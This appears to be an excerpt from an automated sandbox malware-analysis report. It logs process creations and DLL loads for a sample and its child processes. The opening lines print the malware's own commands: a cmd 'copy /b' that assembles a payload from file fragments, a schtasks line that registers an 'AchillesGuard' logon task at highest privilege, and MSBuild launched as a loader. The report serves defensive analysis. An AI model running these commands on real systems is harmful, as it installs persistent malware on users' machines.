                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe"
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: edgegdi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
